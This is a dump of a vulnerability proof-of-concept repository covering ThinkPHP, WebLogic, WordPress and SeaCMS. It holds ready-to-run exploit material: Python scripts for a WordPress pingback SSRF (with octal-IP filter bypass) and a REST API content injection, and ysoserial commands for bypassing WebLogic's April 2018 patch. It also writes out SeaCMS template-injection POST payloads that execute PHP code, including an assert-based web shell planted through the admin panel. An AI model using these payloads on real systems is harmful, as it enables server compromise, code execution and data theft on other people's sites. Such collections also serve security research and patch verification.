| ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 32 | POSSIBILITY OF SUCH DAMAGE. 33 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/application/.htaccess: -------------------------------------------------------------------------------- 1 | deny from all -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/application/command.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | return []; 13 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/application/common.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | // 应用公共文件 13 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/application/database.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | return [ 13 | // 数据库类型 14 | 'type' => 'mysql', 15 | // 服务器地址 16 | 'hostname' => '127.0.0.1', 17 | // 数据库名 18 | 'database' => '', 19 | // 用户名 20 | 'username' => 'root', 21 | // 密码 22 | 'password' => '', 23 | // 端口 24 | 'hostport' => '', 25 | // 连接dsn 26 | 'dsn' => '', 27 | // 数据库连接参数 28 | 'params' => [], 29 | // 数据库编码默认采用utf8 30 | 'charset' => 'utf8', 31 | // 数据库表前缀 32 | 'prefix' => '', 33 | // 数据库调试模式 34 | 'debug' => true, 35 | // 数据库部署方式:0 集中式(单一服务器),1 分布式(主从服务器) 36 | 'deploy' => 0, 37 | // 数据库读写是否分离 主从式有效 38 | 'rw_separate' => false, 39 | // 读写分离后 主服务器数量 40 | 'master_num' => 1, 41 | // 指定从服务器序号 42 | 'slave_no' => '', 43 | // 自动读取主库数据 44 | 'read_master' => false, 45 | // 是否严格检查字段是否存在 46 | 'fields_strict' => true, 47 | // 数据集返回类型 48 | 'resultset_type' => 'array', 49 | // 自动写入时间戳字段 50 | 'auto_timestamp' => false, 51 | // 时间字段取出后的默认时间格式 52 | 'datetime_format' => 'Y-m-d H:i:s', 53 | // 是否需要进行SQL性能分析 54 | 'sql_explain' => false, 55 | ]; 56 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/application/extra/queue.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | return [ 13 | 'connector' => 'Sync' 14 | ]; 15 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/application/index/controller/Index.php: -------------------------------------------------------------------------------- 1 | *{ padding: 0; margin: 0; } .think_default_text{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333;font-size:18px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.6em; font-size: 42px }

:)

ThinkPHP V5
十年磨一剑 - 为API开发设计的高性能框架

[ V5.0 版本由 七牛云 独家赞助发布 ]
'; 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/application/route.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | return [ 13 | '__pattern__' => [ 14 | 'name' => '\w+', 15 | ], 16 | '[hello]' => [ 17 | ':id' => ['index/hello', ['method' => 'get'], ['id' => '\d+']], 18 | ':name' => ['index/hello', ['method' => 'post']], 19 | ], 20 | 21 | ]; 22 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/application/tags.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | // 应用行为扩展定义文件 13 | return [ 14 | // 应用初始化 15 | 'app_init' => [], 16 | // 应用开始 17 | 'app_begin' => [], 18 | // 模块初始化 19 | 'module_init' => [], 20 | // 操作开始执行 21 | 'action_begin' => [], 22 | // 视图内容过滤 23 | 'view_filter' => [], 24 | // 日志写入 25 | 'log_write' => [], 26 | // 应用结束 27 | 'app_end' => [], 28 | ]; 29 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/build.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | return [ 13 | // 生成应用公共文件 14 | '__file__' => ['common.php', 'config.php', 'database.php'], 15 | 16 | // 定义demo模块的自动生成 (按照实际定义的文件名生成) 17 | 'demo' => [ 18 | '__file__' => ['common.php'], 19 | '__dir__' => ['behavior', 'controller', 'model', 'view'], 20 | 'controller' => ['Index', 'Test', 'UserType'], 21 | 'model' => ['User', 'UserType'], 22 | 'view' => ['index/index'], 23 | ], 24 | // 其他更多的模块定义 25 | ]; 26 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/composer.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "topthink/think", 3 | "description": "the new thinkphp framework", 4 | "type": "project", 5 | "keywords": [ 6 | "framework", 7 | "thinkphp", 8 | "ORM" 9 | ], 10 | "homepage": "http://thinkphp.cn/", 11 | "license": "Apache-2.0", 12 | "authors": [ 13 | { 14 | "name": "liu21st", 15 | "email": "liu21st@gmail.com" 16 | } 17 | ], 18 | "require": { 19 | "php": ">=5.4.0", 20 | "topthink/framework": "5.0.*", 21 | "topthink/think-image": "^1.0", 22 | "topthink/think-captcha": "1.*", 23 | "topthink/think-worker": "1.*", 24 | "topthink/think-queue": "1.*", 25 | "topthink/think-mongo": "1.*", 26 | "topthink/think-oracle": "1.*", 27 | "topthink/think-migration": "1.*" 28 | }, 29 | "autoload": { 30 | "psr-4": { 31 | "app\\": "application" 32 | } 33 | }, 34 | "extra": { 35 | "think-path": "thinkphp" 36 | }, 37 | "config": { 38 | "preferred-install": "dist" 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/extend/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/public/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Options +FollowSymlinks -Multiviews 3 | RewriteEngine On 4 | 5 | RewriteCond %{REQUEST_FILENAME} !-d 6 | RewriteCond %{REQUEST_FILENAME} !-f 7 | RewriteRule ^(.*)$ index.php/$1 [QSA,PT,L] 8 | 9 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/public/favicon.ico -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/public/index.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | // [ 应用入口文件 ] 13 | 14 | // 定义应用目录 15 | define('APP_PATH', __DIR__ . '/../application/'); 16 | // 加载框架引导文件 17 | require __DIR__ . '/../thinkphp/start.php'; 18 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/public/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: 3 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/public/router.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | // $Id$ 12 | 13 | if (is_file($_SERVER["DOCUMENT_ROOT"] . $_SERVER["SCRIPT_NAME"])) { 14 | return false; 15 | } else { 16 | if (!isset($_SERVER['PATH_INFO'])) { 17 | $_SERVER['PATH_INFO'] = $_SERVER['REQUEST_URI']; 18 | } 19 | require __DIR__ . "/index.php"; 20 | } 21 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/public/static/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/runtime/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/think: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env php 2 | 11 | // +---------------------------------------------------------------------- 12 | 13 | // 定义项目路径 14 | define('APP_PATH', __DIR__ . '/application/'); 15 | 16 | // 加载框架引导文件 17 | require __DIR__.'/thinkphp/console.php'; 18 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/vendor/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /WebLogic/CVE-2017-3506 & CVE-2017-10271/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/WebLogic/CVE-2017-3506 & CVE-2017-10271/1.png -------------------------------------------------------------------------------- /WebLogic/CVE-2017-3506 & CVE-2017-10271/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/WebLogic/CVE-2017-3506 & CVE-2017-10271/2.png -------------------------------------------------------------------------------- /WebLogic/CVE-2017-3506 & CVE-2017-10271/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/WebLogic/CVE-2017-3506 & CVE-2017-10271/3.png -------------------------------------------------------------------------------- /WebLogic/CVE-2017-3506 & CVE-2017-10271/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/WebLogic/CVE-2017-3506 & CVE-2017-10271/4.png -------------------------------------------------------------------------------- /WebLogic/CVE-2017-3506 & CVE-2017-10271/README.md: -------------------------------------------------------------------------------- 1 | 2 | # CVE-2017-3506 & CVE-2017-10271 3 | 4 | ## Affected Version 5 | 6 | Oracle WebLogic Server10.3.6.0.0 7 | 8 | Oracle WebLogic Server12.1.3.0.0 9 | 10 | Oracle WebLogic Server12.2.1.1.0 11 | 12 | Oracle WebLogic Server12.2.1.2.0 13 | 14 | ## Exp 15 | 16 | ![exploit](https://raw.githubusercontent.com/SecWiki/CMS-Hunter/master/WebLogic/CVE-2017-3506%20%26%20CVE-2017-10271/1.png) 17 | 18 | ![exploit](https://raw.githubusercontent.com/SecWiki/CMS-Hunter/master/WebLogic/CVE-2017-3506%20%26%20CVE-2017-10271/2.png) 19 | 20 | ![exploit](https://raw.githubusercontent.com/SecWiki/CMS-Hunter/master/WebLogic/CVE-2017-3506%20%26%20CVE-2017-10271/3.png) 21 | 22 | ![exploit](https://raw.githubusercontent.com/SecWiki/CMS-Hunter/master/WebLogic/CVE-2017-3506%20%26%20CVE-2017-10271/4.png) 23 | 24 | ## References 25 | 26 | 1.https://secfree.com/article-635.html 27 | -------------------------------------------------------------------------------- /WebLogic/CVE-2017-3506 & CVE-2017-10271/WebLogic-XMLDecoder.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/WebLogic/CVE-2017-3506 & CVE-2017-10271/WebLogic-XMLDecoder.jar -------------------------------------------------------------------------------- /WebLogic/CVE-2018-2628/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-2628 2 | 3 | testing 4 | 5 | ![testing](https://github.com/SecWiki/CMS-Hunter/blob/master/WebLogic/CVE-2018-2628/testing.png?raw=true) 6 | 7 | exploit https://github.com/frohoff/ysoserial 8 | 9 | ![exploit](https://github.com/SecWiki/CMS-Hunter/blob/master/WebLogic/CVE-2018-2628/bypassing.png?raw=true) 10 | -------------------------------------------------------------------------------- /WebLogic/CVE-2018-2628/bypassing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/WebLogic/CVE-2018-2628/bypassing.png -------------------------------------------------------------------------------- /WebLogic/CVE-2018-2628/testing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/WebLogic/CVE-2018-2628/testing.png -------------------------------------------------------------------------------- /WebLogic/CVE-2018-2893/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-2893 2 | 3 | ## Tools author 4 | 5 | https://github.com/pyn3rd/CVE-2018-2893 6 | 7 | ## Step 1 8 | 9 | `java -jar ysoserial-cve-2018-2893.jar` 10 | 11 | ``` 12 | WHY SO SERIAL? 13 | Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]' 14 | Available payload types: 15 | Payload Authors Dependencies 16 | ------- ------- ------------ 17 | JRMPClient @mbechler 18 | JRMPClient2 19 | JRMPClient3 20 | JRMPClient4 21 | Jdk7u21 @frohoff 22 | ``` 23 | 24 | ## Step 2 25 | 26 | `java -jar ysoserial-cve-2018-2893.jar JRMPClient4 ":" > poc4.ser` 27 | 28 | ## Step 3 29 | 30 | `python weblogic.py poc4.ser` 31 | 32 | 33 | ### Note: Any one of JRMPClient2|JRMPClient3|JRMPClient4 can be utilized to bypass the Critical Patch Update April 2018. 34 | 35 | -------------------------------------------------------------------------------- /WebLogic/CVE-2018-2893/ysoserial-cve-2018-2893.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/WebLogic/CVE-2018-2893/ysoserial-cve-2018-2893.jar -------------------------------------------------------------------------------- /WordPress/WordPress_4.4_SSRF/README.md: -------------------------------------------------------------------------------- 1 | # WordPress_4.4_SSRF 2 | 3 | ## Official 4 | 5 | https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/ 6 | 7 | ## Affected Version 8 | 9 | WordPress <= 4.5 10 | 11 | ## PoC 12 | 13 | 注意: 外网 SSRF 4.4.1 4.4.2 均测试通过,内网测试失败。 14 | 15 | ![poc.png](poc.png) 16 | 17 | DNGLog记录: 18 | 19 | ![dnslog.png](dnslog.png) 20 | 21 | ## References 22 | 23 | 1. http://xlab.baidu.com/wordpress/ 24 | 2. http://blog.csdn.net/cd_xuyue/article/details/52276443 25 | -------------------------------------------------------------------------------- /WordPress/WordPress_4.4_SSRF/dnslog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/WordPress/WordPress_4.4_SSRF/dnslog.png -------------------------------------------------------------------------------- /WordPress/WordPress_4.4_SSRF/poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/WordPress/WordPress_4.4_SSRF/poc.png -------------------------------------------------------------------------------- /WordPress/WordPress_4.4_SSRF/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # project = https://github.com/Xyntax/POC-T 4 | # author = i@cdxy.me 5 | 6 | """ 7 | WordPress 4.4 Server Side Request Forgery (SSRF) 8 | 9 | Version 10 | WordPress <= 4.4.2 11 | 12 | """ 13 | 14 | import requests 15 | 16 | req_timeout = 10 17 | 18 | def check_dns_log(hashstr): 19 | url = 'http://admin.dnslog.link/api/web/0e9cd982/{}/'.format(hashstr) 20 | r = requests.get(url) 21 | return r.text 22 | 23 | 24 | def poc(url): 25 | if '://' not in url: 26 | url = 'http://' + url 27 | targeturl = url.rstrip('/') + "/xmlrpc.php" 28 | 29 | hashstr = 'wpssrf' 30 | # dst = hashstr + '.0e9cd982.dnslog.link' 31 | dst = '012.10.10.1' 32 | 33 | # 第一个地址段为SSRF的目标地址,格式为(http[s]://IP|DOAMIN)[:(80|8080|443)]。 34 | # 只能这三个端口,外网地址全通,内网地址被过滤,可用8进制突破10开头的地址段。 35 | # 第二个地址段需要该站实际存在的文章地址,用?p=1自动适配。 36 | payload = """ 37 | 38 | 39 | pingback.ping 40 | 41 | http://{target}/ 42 | {victim}?p=1 43 | 44 | """.format(target=dst, victim=url.rstrip('/') + '/') 45 | 46 | header = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0', 47 | 'Content-Type': 'text/xml'} 48 | try: 49 | # 无法从回显判断 50 | res = requests.post(targeturl, data=payload, headers=header, timeout=req_timeout) 51 | print res.text 52 | # res = check_dns_log(hashstr) 53 | # if res: 54 | # print '[!] 存在 CSRF 漏洞:{}'.format(url) 55 | # return True 56 | except Exception, e: 57 | pass 58 | return False 59 | 60 | if __name__ == '__main__': 61 | # poc('http://localhost/wordpress/wordpress-4.4.2/wordpress/') 62 | poc('http://localhost/wordpress/wordpress-4.2-zh_CN/wordpress/') 63 | 64 | -------------------------------------------------------------------------------- /WordPress/WordPress_4.7.0-4.7.1_未授权内容注入/README.md: -------------------------------------------------------------------------------- 1 | # WordPress_4.7.0-4.7.1_未授权内容注入 2 | 3 | ## Affected Version 4 | 5 | - WordPress 4.7.0 6 | - WordPress 4.7.1 7 | 8 | ## PoC 9 | 10 | 注意: 从官网下载相应漏洞版本后,需要在断网状态下进行安装测试,否则默认会自动更新修复该漏洞。 11 | 12 | ![poc.png](poc.png) 13 | 14 | ## References 15 | 16 | 1. https://www.exploit-db.com/exploits/41223/ 17 | 2. http://paper.seebug.org/208/ 18 | -------------------------------------------------------------------------------- /WordPress/WordPress_4.7.0-4.7.1_未授权内容注入/poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/WordPress/WordPress_4.7.0-4.7.1_未授权内容注入/poc.png -------------------------------------------------------------------------------- /WordPress/WordPress_4.7.0-4.7.1_未授权内容注入/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # project = https://github.com/Xyntax/POC-T 4 | # author = i@cdxy.me 5 | 6 | import requests 7 | import json 8 | 9 | API_ROUTE = '/index.php/wp-json/wp/v2/posts/' 10 | 11 | 12 | def poc(url): 13 | url = url if '://' in url else 'http://' + url 14 | 15 | try: 16 | r = requests.get(url + API_ROUTE) 17 | id = json.loads(r.content)[0]['id'] # get an exist post id 18 | 19 | post_url = url + API_ROUTE + str(id) 20 | data1 = '{"id": "%s"}' % id 21 | data2 = '{"id": "%sa"}' % id 22 | r1 = requests.post(post_url, data1, headers={'Content-Type': 'application/json'}) 23 | r2 = requests.post(post_url, data2, headers={'Content-Type': 'application/json'}) 24 | print r2.text 25 | if r1.status_code > 400 and r2.status_code == 200 and r1.content != r2.content: 26 | print '[!] {} is vulnerable!'.format(post_url) 27 | return post_url 28 | except: 29 | return False 30 | 31 | return False 32 | 33 | 34 | if __name__ == '__main__': 35 | poc('http://localhost/wordpress/wordpress-4.7.1/wordpress') -------------------------------------------------------------------------------- /WordPress/WordPress_4.7_Info_Disclosure/README.md: -------------------------------------------------------------------------------- 1 | # WordPress_4.7_Info_Disclosure 2 | 3 | ## Official 4 | 5 | https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ 6 | 7 | ## Affected Version 8 | 9 | WordPress 4.7 (4.7.1 fixed) 10 | 11 | ## PoC 12 | 13 | ![poc.png](poc.png) 14 | 15 | ## References 16 | 17 | 1. https://wpvulndb.com/vulnerabilities/8715 18 | -------------------------------------------------------------------------------- /WordPress/WordPress_4.7_Info_Disclosure/poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/WordPress/WordPress_4.7_Info_Disclosure/poc.png -------------------------------------------------------------------------------- /WordPress/WordPress_4.7_Info_Disclosure/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # project = https://github.com/Xyntax/POC-T 4 | # author = i@cdxy.me 5 | 6 | """ 7 | WordPress 4.7 - User Information Disclosure via REST API 8 | Ref https://wpvulndb.com/vulnerabilities/8715 9 | Version WordPress == 4.7.0 10 | """ 11 | 12 | import requests 13 | 14 | def poc(url): 15 | url = url if '://' else 'http://' + url 16 | payload = '/wp-json/wp/v2/users' 17 | url = url.rstrip('/') + payload 18 | try: 19 | r = requests.get(url) 20 | if r.status_code == 200 and '[{"id":1,"name":"' in r.content: 21 | print '[!] 存在漏洞:{} '.format(url) 22 | return True 23 | except Exception: 24 | pass 25 | return False 26 | 27 | if __name__ == '__main__': 28 | poc('http://localhost/wordpress/wordpress-4.7/wordpress/') -------------------------------------------------------------------------------- /seacms/SeaCMS v6.45前台Getshell 代码执行/readme.md: -------------------------------------------------------------------------------- 1 | ## Affected Version 6.45 2 | 3 | 下载地址: 4 | 5 | 链接:https://pan.baidu.com/s/1uw_VnxnvG4GGEae4TRsGGw 6 | 7 | 密码:cd48 8 | 9 | 10 | 11 | 12 | ## POC 13 | 14 | 15 | 16 | `http://127.0.0.1/seacms645/search.php` 17 | 18 | `post:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}` 19 | 20 | 21 | 22 | ![](http://opmi2ydgh.bkt.clouddn.com//18-7-5/92423502.jpg) 23 | 24 | 25 | 26 | ## References 27 | 28 | [https://bbs.ichunqiu.com/thread-35085-1-1.htmlß](https://bbs.ichunqiu.com/thread-35085-1-1.htm) 29 | 30 | [http://0day5.com/archives/4249/](http://0day5.com/archives/4249/) 31 | 32 | [https://blog.csdn.net/qq_35078631/article/details/76595817](https://blog.csdn.net/qq_35078631/article/details/76595817) 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /seacms/seacms 6.55 代码执行/seacms6.55.md: -------------------------------------------------------------------------------- 1 | ## Affected Version 6.55 2 | 3 | 链接:https://pan.baidu.com/s/1UmbsQjQ4o4JFtK1MLHtf3g 4 | 密码:k4x1 5 | 6 | ## POC 7 | 8 | http://192.168.0.6/seacms655/search.php?phpinfo(); 9 | post: 10 | searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/* 11 | 12 | ![](http://opmi2ydgh.bkt.clouddn.com//18-7-18/40373679.jpg) 13 | 14 | ## References 15 | 16 | [海洋CMS(SEACMS)新版本V6.55补丁仍可被绕过执行任意代码](http://www.freebuf.com/vuls/150303.html) 17 | 18 | [seacms 6.55 代码注入漏洞](https://github.com/SukaraLin/php_code_audit_project/blob/master/seacms/seacms%206.55%20%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md) -------------------------------------------------------------------------------- /seacms/seacms6.54代码执行/seacms6.54.md: -------------------------------------------------------------------------------- 1 | ## Affected Version 6.54 2 | 3 | 链接:https://pan.baidu.com/s/16rV0_xnoN_8-v4WVpCq6YA 4 | 5 | 密码:qlwh 6 | 7 | 8 | 9 | 6.54 和6.53版本的不同之处是在: 10 | 11 | `search.php`的65行的`order`参数做了限制。 12 | 13 | `$order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : "";` 14 | 15 | 16 | 17 | ``` 18 | 更新日期:2017年8月7日 v6.54 19 | 修复:紧急修复2处高危安全漏洞 20 | 21 | 更新日期:2017年8月6日 v6.53 22 | 新增:微信公众平台模块 23 | 优化:采集逻辑 24 | 修复:部分文字描述错误 25 | 更新日期:2017年2月18日 v6.46 26 | 修复:两处安全问题 27 | 28 | 更新日期:2017年2月6日 v6.45 29 | 修复:一处安全问题 30 | ``` 31 | 32 | ​ 33 | 34 | ## POC 35 | 36 | 37 | 38 | http://192.168.0.6/seacms654/search.php 39 | POST: 40 | searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo(); 41 | 42 | 43 | 44 | ## References 45 | 46 | [漏洞预警 | 海洋CMS(SEACMS)0day漏洞预警](http://www.freebuf.com/vuls/150042.html) 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /seacms/seacms6.61/seacms.md: -------------------------------------------------------------------------------- 1 | ## Affected Version 6.61 2 | 3 | 4 | 5 | ## POC 6 | 7 | 8 | 9 | 后台的-->添加影片--> 图片地址-->payload 10 | 11 | `{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}` 12 | 13 | ![](http://opmi2ydgh.bkt.clouddn.com//18-7-31/2272010.jpg) 14 | 15 | 16 | 17 | 访问 18 | 19 | 20 | 21 | `http://192.168.0.6/seacms661/detail/?1.html&a=assert&b=phpinfo();` 22 | 23 | `http://192.168.0.6/seacms661/search.php?searchtype=5&tid=0&a=assert&b=phpinfo();` 24 | 25 | 26 | 27 | ![](http://opmi2ydgh.bkt.clouddn.com//18-7-31/68446790.jpg) 28 | 29 | 30 | 31 | ## References 32 | 33 | 34 | 35 | [seacms backend getshell](http://hexo.imagemlt.xyz/post/seacms-backend-getshell/index.html) 36 | 37 | [CVE-2018-14421——Seacms后台getshell分析](https://www.anquanke.com/post/id/152764) 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /seacms/seacms6.61/seacms661.md: -------------------------------------------------------------------------------- 1 | ## Seacms has some XSS vulnerabilities in the admin_config.php file 2 | 3 | 4 | 5 | ## Affected Version 6 | 7 | 8 | 9 | Seams 6.61 10 | 11 | 12 | 13 | ## POC 14 | 15 | 16 | 17 | **First:** 18 | 19 | ![](http://opmi2ydgh.bkt.clouddn.com//18-7-22/80649510.jpg) 20 | 21 | 22 | 23 | 24 | 25 | ![](http://opmi2ydgh.bkt.clouddn.com//18-7-22/22988826.jpg) 26 | 27 | 28 | 29 | **Second** 30 | 31 | ![](http://opmi2ydgh.bkt.clouddn.com//18-7-22/3792136.jpg) 32 | 33 | ![](http://opmi2ydgh.bkt.clouddn.com//18-7-22/62212586.jpg) 34 | 35 | 36 | 37 | **Others** 38 | 39 | Some other parameters may not be filtered. 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | --------------------------------------------------------------------------------